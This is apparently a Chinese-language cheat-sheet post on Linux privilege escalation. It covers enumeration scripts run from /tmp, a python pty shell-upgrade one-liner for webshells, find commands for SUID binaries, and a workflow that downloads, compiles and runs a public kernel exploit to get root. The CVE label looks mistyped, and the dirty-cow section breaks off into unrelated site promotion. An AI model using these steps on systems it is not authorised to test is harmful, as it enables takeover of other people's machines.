Linux提权
一、Linux信息收集:LinEnum脚本地址:https://github.com/rebootuser/LinEnum介绍:用法:上传到 /tmp目录下,然后运行即可二、Linux漏洞探测:5. Linux-exploit-suggester脚本6. 地址:https://github.com/mzet-/linux-exploit-suggester7. 介绍:8. 用法:上传到 /tmp目
一、Linux信息收集:
- LinEnum脚本
- 地址:https://github.com/rebootuser/LinEnum
- 介绍:
- 用法:
上传到 /tmp目录下,然后运行即可
二、Linux漏洞探测:
5. Linux-exploit-suggester脚本
6. 地址:https://github.com/mzet-/linux-exploit-suggester
7. 介绍:
8. 用法:
上传到 /tmp目录下,然后运行即可
三、Linux漏洞探测:
9. Linux-exploit-suggester-2.pl脚本
10. 地址:https://github.com/jondonas/linux-exploit-suggester-2
11. 介绍:
12. 用法:
上传到 /tmp目录下,然后使用perl运行即可(需要安装perl命令)
prel Linux-exploit-suggester-2.pl
四、Linux提权方式:
**注意1:**凡是需要编译的,均无法在webshell内执行,如gcc、make等
注意2:
python调用本地shell实现交互式命令行
python -c 'import pty;pty.spawn('/bin/bash')'
SUID提权:
- 参考:https://pentestlab.blog/2017/09/25/suid-executables/
- 关键:查找SUID中是否含有以下支持命令:
Nmap、Vim、find、Bash、More、Less、Nano、cp
- 手工判断:
find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} \;
内核漏洞提权
- CVE-2017-16695
- 下载C代码:
wget https://github.com/Jewel591/Privilege-Escalation/blob/master/45010.c
- 使用步骤:
#下面进行编译
gcc 45010.c -o 45010
#添加执行权限
chmod +x 45010
./45010
#成功提权到 root。
whoami
root
脏牛漏洞提权
开放原子开发者工作坊旨在鼓励更多人参与开源活动,与志同道合的开发者们相互交流开发经验、分享开发心得、获取前沿技术趋势。工作坊有多种形式的开发者活动,如meetup、训练营等,主打技术交流,干货满满,真诚地邀请各位开发者共同参与!
更多推荐
所有评论(0)